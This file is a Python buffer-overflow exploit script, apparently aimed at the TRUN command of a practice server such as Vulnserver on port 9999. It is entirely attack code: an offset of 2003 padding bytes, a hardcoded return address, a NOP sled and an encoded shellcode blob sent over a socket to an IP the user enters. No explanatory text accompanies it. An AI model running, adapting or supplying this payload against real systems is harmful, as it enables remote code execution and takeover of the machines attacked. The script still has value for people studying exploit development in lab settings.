6-exploit.py

#!/usr/bin/python3

import socket
import sys

bof = (b"\xd9\xd0\xba\xf2\xd6\xf7\x63\xd9\x74\x24\xf4\x58\x31\xc9"
b"\xb1\x52\x31\x50\x17\x83\xc0\x04\x03\xa2\xc5\x15\x96\xbe"
b"\x02\x5b\x59\x3e\xd3\x3c\xd3\xdb\xe2\x7c\x87\xa8\x55\x4d"
b"\xc3\xfc\x59\x26\x81\x14\xe9\x4a\x0e\x1b\x5a\xe0\x68\x12"
b"\x5b\x59\x48\x35\xdf\xa0\x9d\x95\xde\x6a\xd0\xd4\x27\x96"
b"\x19\x84\xf0\xdc\x8c\x38\x74\xa8\x0c\xb3\xc6\x3c\x15\x20"
b"\x9e\x3f\x34\xf7\x94\x19\x96\xf6\x79\x12\x9f\xe0\x9e\x1f"
b"\x69\x9b\x55\xeb\x68\x4d\xa4\x14\xc6\xb0\x08\xe7\x16\xf5"
b"\xaf\x18\x6d\x0f\xcc\xa5\x76\xd4\xae\x71\xf2\xce\x09\xf1"
b"\xa4\x2a\xab\xd6\x33\xb9\xa7\x93\x30\xe5\xab\x22\x94\x9e"
b"\xd0\xaf\x1b\x70\x51\xeb\x3f\x54\x39\xaf\x5e\xcd\xe7\x1e"
b"\x5e\x0d\x48\xfe\xfa\x46\x65\xeb\x76\x05\xe2\xd8\xba\xb5"
b"\xf2\x76\xcc\xc6\xc0\xd9\x66\x40\x69\x91\xa0\x97\x8e\x88"
b"\x15\x07\x71\x33\x66\x0e\xb6\x67\x36\x38\x1f\x08\xdd\xb8"
b"\xa0\xdd\x72\xe8\x0e\x8e\x32\x58\xef\x7e\xdb\xb2\xe0\xa1"
b"\xfb\xbd\x2a\xca\x96\x44\xbd\x59\x7f\x95\x5b\xca\x82\x19"
b"\xa0\xd8\x0a\xff\xc2\xcc\x5a\xa8\x7a\x74\xc7\x22\x1a\x79"
b"\xdd\x4f\x1c\xf1\xd2\xb0\xd3\xf2\x9f\xa2\x84\xf2\xd5\x98"
b"\x03\x0c\xc0\xb4\xc8\x9f\x8f\x44\x86\x83\x07\x13\xcf\x72"
b"\x5e\xf1\xfd\x2d\xc8\xe7\xff\xa8\x33\xa3\xdb\x08\xbd\x2a"
b"\xa9\x35\x99\x3c\x77\xb5\xa5\x68\x27\xe0\x73\xc6\x81\x5a"
b"\x32\xb0\x5b\x30\x9c\x54\x1d\x7a\x1f\x22\x22\x57\xe9\xca"
b"\x93\x0e\xac\xf5\x1c\xc7\x38\x8e\x40\x77\xc6\x45\xc1\x97"
b"\x25\x4f\x3c\x30\xf0\x1a\xfd\x5d\x03\xf1\xc2\x5b\x80\xf3"
b"\xba\x9f\x98\x76\xbe\xe4\x1e\x6b\xb2\x75\xcb\x8b\x61\x75"
b"\xde")

shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + bof

try:
    ip_address = input("Enter the server IP address: ")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((ip_address, 9999))
    s.send(b'TRUN /.:/' + shellcode)
    print("Fuzzing with TRUN command with %s bytes" % len(shellcode))
    s.close()
except Exception as e:
    print("Error connecting to server:", e)
    sys.exit()